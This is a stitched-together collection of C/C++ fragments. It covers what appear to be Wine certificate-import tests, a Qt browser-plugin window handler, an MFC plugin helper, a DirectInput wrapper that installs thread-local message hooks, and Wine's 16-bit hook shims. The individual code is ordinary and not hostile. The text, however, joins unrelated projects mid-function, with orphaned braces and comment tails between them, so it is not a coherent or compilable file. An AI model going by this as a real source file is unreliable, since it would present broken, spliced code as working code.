CertFreeCRLContext(info.u.pCRLContext);
/* Imports the following cert--self-signed, with no basic constraints set--
* to the CA store. Puts up a dialog at the end if it succeeds or fails.
*/
info.dwSubjectChoice = CRYPTUI_WIZ_IMPORT_SUBJECT_CERT_CONTEXT;
info.u.pCertContext = CertCreateCertificateContext(X509_ASN_ENCODING,
v1CertWithValidPubKey, sizeof(v1CertWithValidPubKey));
ret = pCryptUIWizImport(CRYPTUI_WIZ_NO_UI, 0, NULL, &info, NULL);
ok(ret, "CryptUIWizImport failed: %08x\n", GetLastError());
if (ret)
{
static const WCHAR CA[] = { 'C','A',0 };
HCERTSTORE ca = CertOpenStore(CERT_STORE_PROV_SYSTEM_W, 0, 0,
CERT_SYSTEM_STORE_CURRENT_USER, CA);
if (ca)
{
ret = find_and_delete_cert_in_store(ca, info.u.pCertContext);
ok(ret ||
broken(!ret) /* Win9x/NT4 */,
"expected to find v1CertWithValidPubKey in CA store\n");
CertCloseStore(ca, 0);
}
}
CertFreeCertificateContext(info.u.pCertContext);
/* Imports the following cert--not self-signed, with a basic constraints2
* extensions--to the "AddressBook" store. Puts up a dialog at the end if
* it succeeds or fails.
*/
info.u.pCertContext = CertCreateCertificateContext(X509_ASN_ENCODING,
iTunesCert3, sizeof(iTunesCert3));
ret = pCryptUIWizImport(CRYPTUI_WIZ_NO_UI, 0, NULL, &info, NULL);
ok(ret, "CryptUIWizImport failed: %08x\n", GetLastError());
if (ret)
{
static const WCHAR AddressBook[] = { 'A','d','d','r','e','s','s',
'B','o','o','k',0 };
HCERTSTORE addressBook = CertOpenStore(CERT_STORE_PROV_SYSTEM_W, 0, 0,
CERT_SYSTEM_STORE_CURRENT_USER, AddressBook);
if (addressBook)
{
ret = find_and_delete_cert_in_store(addressBook,
info.u.pCertContext);
ok(ret ||
broken(!ret), /* Windows 2000 and earlier */
"expected to find iTunesCert3 in AddressBook store\n");
CertCloseStore(addressBook, 0);
}
}
/* Displays the wizard, but disables the "Certificate store" edit and
* the Browse button. Confusingly, the "Place all certificates in the
* following store" radio button is not disabled.
*/
if (0)
{
ret = pCryptUIWizImport(CRYPTUI_WIZ_IMPORT_NO_CHANGE_DEST_STORE, 0,
NULL, &info, NULL);
ok(ret, "CryptUIWizImport failed: %08x\n", GetLastError());
}
store = CertOpenStore(CERT_STORE_PROV_MEMORY, X509_ASN_ENCODING, 0,
CERT_STORE_CREATE_NEW_FLAG, NULL);
/* Displays the wizard, but sets the "Certificate store" edit to the
* string "Determined by the program", and disables it and the Browse
* button, as well as the "Automatically select the certificate store
* based on the type of certificate" radio button.
*/
if (0)
{
ret = pCryptUIWizImport(CRYPTUI_WIZ_IMPORT_NO_CHANGE_DEST_STORE, 0,
NULL, &info, store);
ok(ret, "CryptUIWizImport failed: %08x\n", GetLastError());
}
ret = pCryptUIWizImport(CRYPTUI_WIZ_NO_UI |
CRYPTUI_WIZ_IMPORT_NO_CHANGE_DEST_STORE, 0, NULL, &info, store);
ok(ret, "CryptUIWizImport failed: %08x\n", GetLastError());
ret = find_and_delete_cert_in_store(store, info.u.pCertContext);
ok(ret ||
broken(!ret) /* Win9x/NT4 */,
"expected to find iTunesCert3 in memory store\n");
CertFreeCertificateContext(info.u.pCertContext);
CertCloseStore(store, 0);
info.u.pCertContext = CertCreateCertificateContext(X509_ASN_ENCODING,
iTunesCert1, sizeof(iTunesCert1));
ret = pCryptUIWizImport(CRYPTUI_WIZ_NO_UI, 0, NULL, &info, NULL);
ok(ret, "CryptUIWizImport failed: %08x\n", GetLastError());
if (ret)
{
static const WCHAR AddressBook[] = { 'A','d','d','r','e','s','s',
'B','o','o','k',0 };
HCERTSTORE addressBook = CertOpenStore(CERT_STORE_PROV_SYSTEM_W, 0, 0,
CERT_SYSTEM_STORE_CURRENT_USER, AddressBook);
if (addressBook)
{
ret = find_and_delete_cert_in_store(addressBook,
info.u.pCertContext);
ok(ret ||
broken(!ret), /* Windows 2000 and earlier */
"expected to find iTunesCert1 in AddressBook store\n");
CertCloseStore(addressBook, 0);
}
}
CertFreeCertificateContext(info.u.pCertContext);
info.u.pCertContext = CertCreateCertificateContext(X509_ASN_ENCODING,
iTunesCert2, sizeof(iTunesCert2));
ret = pCryptUIWizImport(CRYPTUI_WIZ_NO_UI, 0, NULL, &info, NULL);
ok(ret, "CryptUIWizImport failed: %08x\n", GetLastError());
if (ret)
{
static const WCHAR CA[] = { 'C','A',0 };
HCERTSTORE ca = CertOpenStore(CERT_STORE_PROV_SYSTEM_W, 0, 0,
CERT_SYSTEM_STORE_CURRENT_USER, CA);
if (ca)
{
ret = find_and_delete_cert_in_store(ca, info.u.pCertContext);
ok(ret ||
broken(!ret) /* Win9x/NT4 */,
"expected to find iTunesCert2 in CA store\n");
CertCloseStore(ca, 0);
}
}
CertFreeCertificateContext(info.u.pCertContext);
info.u.hCertStore = CertOpenStore(CERT_STORE_PROV_MEMORY, 0, 0,
CERT_STORE_CREATE_NEW_FLAG, NULL);
CertAddEncodedCertificateToStore(info.u.hCertStore, X509_ASN_ENCODING,
v1CertWithValidPubKey, sizeof(v1CertWithValidPubKey),
CERT_STORE_ADD_ALWAYS, NULL);
CertAddEncodedCRLToStore(info.u.hCertStore, X509_ASN_ENCODING, signedCRL,
sizeof(signedCRL), CERT_STORE_ADD_ALWAYS, NULL);
info.dwSubjectChoice = CRYPTUI_WIZ_IMPORT_SUBJECT_CERT_STORE;
/* The ALLOW flags aren't allowed with a store as the source if the source
* contains types other than those allowed.
*/
store = CertOpenStore(CERT_STORE_PROV_MEMORY, 0, 0,
CERT_STORE_CREATE_NEW_FLAG, NULL);
SetLastError(0xdeadbeef);
ret = pCryptUIWizImport(CRYPTUI_WIZ_NO_UI | CRYPTUI_WIZ_IMPORT_ALLOW_CERT,
0, NULL, &info, store);
ok(!ret && GetLastError() == E_INVALIDARG,
"expected E_INVALIDARG, got %08x\n", GetLastError());
SetLastError(0xdeadbeef);
ret = pCryptUIWizImport(CRYPTUI_WIZ_NO_UI | CRYPTUI_WIZ_IMPORT_ALLOW_CRL,
0, NULL, &info, store);
ok(!ret && GetLastError() == E_INVALIDARG,
"expected E_INVALIDARG, got %08x\n", GetLastError());
SetLastError(0xdeadbeef);
ret = pCryptUIWizImport(CRYPTUI_WIZ_NO_UI |
CRYPTUI_WIZ_IMPORT_NO_CHANGE_DEST_STORE |
CRYPTUI_WIZ_IMPORT_ALLOW_CERT | CRYPTUI_WIZ_IMPORT_ALLOW_CRL, 0, NULL,
&info, store);
ok(ret, "CryptUIWizImport failed: %08x\n", GetLastError());
if (ret)
{
count = 0;
cert = NULL;
do {
cert = CertEnumCertificatesInStore(store, cert);
if (cert)
count++;
} while (cert);
ok(count == 1, "expected 1 cert, got %d\n", count);
count = 0;
crl = NULL;
do {
crl = CertEnumCRLsInStore(store, crl);
if (crl)
count++;
} while (crl);
ok(count == 1, "expected 1 CRL, got %d\n", count);
}
CertCloseStore(store, 0);
CertCloseStore(info.u.hCertStore, 0);
/* If the ALLOW flags match the content of the store, the store can be
* imported.
*/
info.u.hCertStore = CertOpenStore(CERT_STORE_PROV_MEMORY, 0, 0,
CERT_STORE_CREATE_NEW_FLAG, NULL);
CertAddEncodedCertificateToStore(info.u.hCertStore, X509_ASN_ENCODING,
v1CertWithValidPubKey, sizeof(v1CertWithValidPubKey),
CERT_STORE_ADD_ALWAYS, NULL);
store = CertOpenStore(CERT_STORE_PROV_MEMORY, 0, 0,
CERT_STORE_CREATE_NEW_FLAG, NULL);
SetLastError(0xdeadbeef);
ret = pCryptUIWizImport(CRYPTUI_WIZ_NO_UI | CRYPTUI_WIZ_IMPORT_ALLOW_CERT,
0, NULL, &info, store);
ok(ret, "CryptUIWizImport failed: %08x\n", GetLastError());
if (ret)
{
count = 0;
cert = NULL;
do {
cert = CertEnumCertificatesInStore(store, cert);
if (cert)
count++;
} while (cert);
ok(count == 1, "expected 1 cert, got %d\n", count);
count = 0;
crl = NULL;
do {
crl = CertEnumCRLsInStore(store, crl);
if (crl)
count++;
} while (crl);
ok(count == 0, "expected 0 CRLs, got %d\n", count);
}
SetLastError(0xdeadbeef);
ret = pCryptUIWizImport(CRYPTUI_WIZ_NO_UI | CRYPTUI_WIZ_IMPORT_ALLOW_CRL,
0, NULL, &info, store);
ok(!ret && GetLastError() == E_INVALIDARG,
"expected E_INVALIDARG, got %08x\n", GetLastError());
CertCloseStore(store, 0);
CertCloseStore(info.u.hCertStore, 0);
/* Again, if the ALLOW flags match the content of the store, the store can
* be imported.
*/
info.u.hCertStore = CertOpenStore(CERT_STORE_PROV_MEMORY, 0, 0,
CERT_STORE_CREATE_NEW_FLAG, NULL);
CertAddEncodedCRLToStore(info.u.hCertStore, X509_ASN_ENCODING, signedCRL,
sizeof(signedCRL), CERT_STORE_ADD_ALWAYS, NULL);
store = CertOpenStore(CERT_STORE_PROV_MEMORY, 0, 0,
CERT_STORE_CREATE_NEW_FLAG, NULL);
SetLastError(0xdeadbeef);
ret = pCryptUIWizImport(CRYPTUI_WIZ_NO_UI | CRYPTUI_WIZ_IMPORT_ALLOW_CRL,
0, NULL, &info, store);
ok(ret, "CryptUIWizImport failed: %08x\n", GetLastError());
if (ret)
{
count = 0;
cert = NULL;
do {
cert = CertEnumCertificatesInStore(store, cert);
if (cert)
count++;
} while (cert);
ok(count == 0, "expected 0 certs, got %d\n", count);
count = 0;
crl = NULL;
do {
crl = CertEnumCRLsInStore(store, crl);
if (crl)
count++;
} while (crl);
ok(count == 1, "expected 1 CRL, got %d\n", count);
}
SetLastError(0xdeadbeef);
ret = pCryptUIWizImport(CRYPTUI_WIZ_NO_UI | CRYPTUI_WIZ_IMPORT_ALLOW_CERT,
0, NULL, &info, store);
ok(!ret && GetLastError() == E_INVALIDARG,
"expected E_INVALIDARG, got %08x\n", GetLastError());
CertCloseStore(store, 0);
CertCloseStore(info.u.hCertStore, 0);
UnhookWindowsHookEx(hook);
}
extern "C" NPError
NPP_SetWindow(NPP instance, NPWindow* window)
{
if (!qNP) qNP = QNPlugin::create();
NPError result = NPERR_NO_ERROR;
_NPInstance* This;
if (instance == NULL)
return NPERR_INVALID_INSTANCE_ERROR;
This = (_NPInstance*) instance->pdata;
// take a shortcut if all that was changed is the geometry
if ( This->widget && window
#ifdef Q_WS_X11
&& This->window == (Window) window->window
#endif
#ifdef Q_WS_WIN
&& This->window == (HWND) window->window
#endif
) {
This->x = window->x;
This->y = window->y;
This->width = window->width;
This->height = window->height;
This->widget->resize( This->width, This->height );
return result;
}
delete This->widget;
if ( !window )
return result;
#ifdef Q_WS_X11
This->window = (Window) window->window;
This->display =
((NPSetWindowCallbackStruct *)window->ws_info)->display;
#endif
#ifdef Q_WS_WIN
This->window = (HWND) window->window;
#endif
This->x = window->x;
This->y = window->y;
This->width = window->width;
This->height = window->height;
if (!qApp) {
#ifdef Q_WS_X11
// We are the first Qt-based plugin to arrive
event_loop = new QNPXt( "qnp", XtDisplayToApplicationContext(This->display) );
application = new QApplication(This->display);
#endif
#ifdef Q_WS_WIN
static int argc=0;
static char **argv={ 0 };
application = new QApplication( argc, argv );
#ifdef UNICODE
if ( qWinVersion() & Qt::WV_NT_based )
hhook = SetWindowsHookExW( WH_GETMESSAGE, FilterProc, 0, GetCurrentThreadId() );
else
#endif
hhook = SetWindowsHookExA( WH_GETMESSAGE, FilterProc, 0, GetCurrentThreadId() );
#endif
}
#ifdef Q_WS_X11
if ( !original_x_errhandler )
original_x_errhandler = XSetErrorHandler( dummy_x_errhandler );
#endif
// New widget on this new window.
next_pi = This;
/* This->widget = */ // (happens sooner - in QNPWidget constructor)
This->instance->newWindow();
if ( !This->widget )
return result;
#ifdef Q_WS_X11
This->widget->resize( This->width, This->height );
XReparentWindow( This->widget->x11Display(), This->widget->winId(), This->window, 0, 0 );
XSync( This->widget->x11Display(), False );
#endif
#ifdef Q_WS_WIN
LONG oldLong = GetWindowLong(This->window, GWL_STYLE);
::SetWindowLong(This->window, GWL_STYLE, oldLong | WS_CLIPCHILDREN | WS_CLIPSIBLINGS);
::SetWindowLong( This->widget->winId(), GWL_STYLE, WS_CHILD | WS_CLIPCHILDREN | WS_CLIPSIBLINGS );
::SetParent( This->widget->winId(), This->window );
This->widget->raise();
This->widget->setGeometry( 0, 0, This->width, This->height );
#endif
This->widget->show();
return result;
}
{
if (dwReason == DLL_PROCESS_ATTACH)
QMfcApp::pluginInstance(hInstance);
return TRUE;
}
\endcode
*/
bool pluginInstance(Qt::HANDLE plugin)
{
if (qApp)
return FALSE;
QT_WA({
hhook = SetWindowsHookExW(WH_GETMESSAGE, QtFilterProc, 0, GetCurrentThreadId());
}, {
hhook = SetWindowsHookExA(WH_GETMESSAGE, QtFilterProc, 0, GetCurrentThreadId());
});
int argc = 0;
(void)new QApplication(argc, 0);
if (plugin) {
char filename[256];
if (GetModuleFileNameA((HINSTANCE)plugin, filename, 255))
LoadLibraryA(filename);
}
return TRUE;
}
bool WrapperSystem::Init( HANDLE mod_hnd ) {
char dinputDllName[ MAX_PATH ];
// returns with system32 even on win64 32bit mode, but image loader solves it
GetSystemDirectoryA( dinputDllName, MAX_PATH );
button6ShutdownEvent.Clear( );
button6ShutdownEvent.SetType( type_button_6 );
button6ShutdownEvent.usButtonFlags = 0x800;
button6ShutdownEvent.usButtonData = 0;
button7ShutdownEvent.Clear( );
button7ShutdownEvent.SetType( type_button_7 );
button7ShutdownEvent.usButtonFlags = 0x800;
button7ShutdownEvent.usButtonData = 0;
memset( immediateBuffer, 0, sizeof( LONG ) * type_list_size );
bufferedMode = false;
#ifdef DI_WRAPPER8
strcat( dinputDllName, "\\dinput8.dll" );
#else
strcat( dinputDllName, "\\dinput.dll" );
#endif
dinputDll = LoadLibraryA( dinputDllName );
// MSDN: If the function succeeds, the return value is greater than 31.
if( dinputDll > ( HMODULE )31 ) {
#ifdef DI_WRAPPER8
DirectInput8Create = ( DIRECTINPUT8CREATEPROC )GetProcAddress( dinputDll, "DirectInput8Create" );
if( !DirectInput8Create ) {
#else
DirectInputCreateA = ( DIRECTINPUTCREATEAPROC )GetProcAddress( dinputDll, "DirectInputCreateA" );
if( !DirectInputCreateA ) {
#endif
Shutdown( );
return false;
}
wrapperModule = mod_hnd;
return true;
}
return false;
}
void WrapperSystem::Shutdown( ) {
for( WrapperList::iterator wrpItr = wrappers.begin( ); wrpItr != wrappers.end( ); wrpItr++ ) {
delete *wrpItr;
}
bufferedMode = false;
if( hookHandleGetMessage ) {
UnhookWindowsHookEx( hookHandleGetMessage );
hookHandleGetMessage = 0;
}
if( hookHandleCallWnd ) {
UnhookWindowsHookEx( hookHandleCallWnd );
hookHandleCallWnd = 0;
}
FreeLibrary( dinputDll );
}
void WrapperSystem::InitHID( HWND & h_wnd ) {
RECT windowRect = { 0 };
if( hidInitialized ) return;
// jk2 sends a null hwnd, and RegisterRawInputDevices fails without it, so grab one with GetForegroundWindow
if( !h_wnd ) {
h_wnd = GetForegroundWindow( );
}
RAWINPUTDEVICE Rid;
Rid.usUsagePage = HID_USAGE_PAGE_GENERIC;
Rid.usUsage = HID_USAGE_GENERIC_MOUSE;
Rid.dwFlags = RIDEV_INPUTSINK;
Rid.hwndTarget = h_wnd;
if( !RegisterRawInputDevices( &Rid, 1, sizeof( RAWINPUTDEVICE ) ) ) return;
// register our hook into the game main message loop
if( !( hookHandleGetMessage = SetWindowsHookExA( WH_GETMESSAGE, WindowHookFuncGetMessage, ( HINSTANCE )wrapperModule, GetCurrentThreadId( ) ) ) ) return;
if( !( hookHandleCallWnd = SetWindowsHookExA( WH_CALLWNDPROC, WindowHookFuncCallWnd, ( HINSTANCE )wrapperModule, GetCurrentThreadId( ) ) ) ) return;
hidInitialized = true;
}
/***********************************************************************
* SetWindowsHookEx (USER.291)
*/
HHOOK WINAPI SetWindowsHookEx16( INT16 id, HOOKPROC16 proc, HINSTANCE16 hInst, HTASK16 hTask )
{
struct user_thread_info *thread_info = get_user_thread_info();
struct hook16_queue_info *info;
HHOOK hook;
int index = id - WH_MINHOOK;
if (id < WH_MINHOOK || id > WH_MAXHOOK16) return 0;
if (!hook_procs[index])
{
FIXME( "hook type %d broken in Win16\n", id );
return 0;
}
if (!hTask) FIXME( "System-global hooks (%d) broken in Win16\n", id );
else if (hTask != GetCurrentTask())
{
FIXME( "setting hook (%d) on other task not supported\n", id );
return 0;
}
if (!(info = thread_info->hook16_info))
{
if (!(info = HeapAlloc( GetProcessHeap(), HEAP_ZERO_MEMORY, sizeof(*info) ))) return 0;
thread_info->hook16_info = info;
}
if (info->hook[index])
{
FIXME( "Multiple hooks (%d) for the same task not supported yet\n", id );
return 0;
}
if (!(hook = SetWindowsHookExA( id, hook_procs[index], 0, GetCurrentThreadId() ))) return 0;
info->hook[index] = hook;
info->proc[index] = proc;
return hook;
}
/***********************************************************************
* SetWindowsHookA (USER32.@)
*/
HHOOK WINAPI SetWindowsHookA( INT id, HOOKPROC proc )
{
return SetWindowsHookExA( id, proc, 0, GetCurrentThreadId() );
}
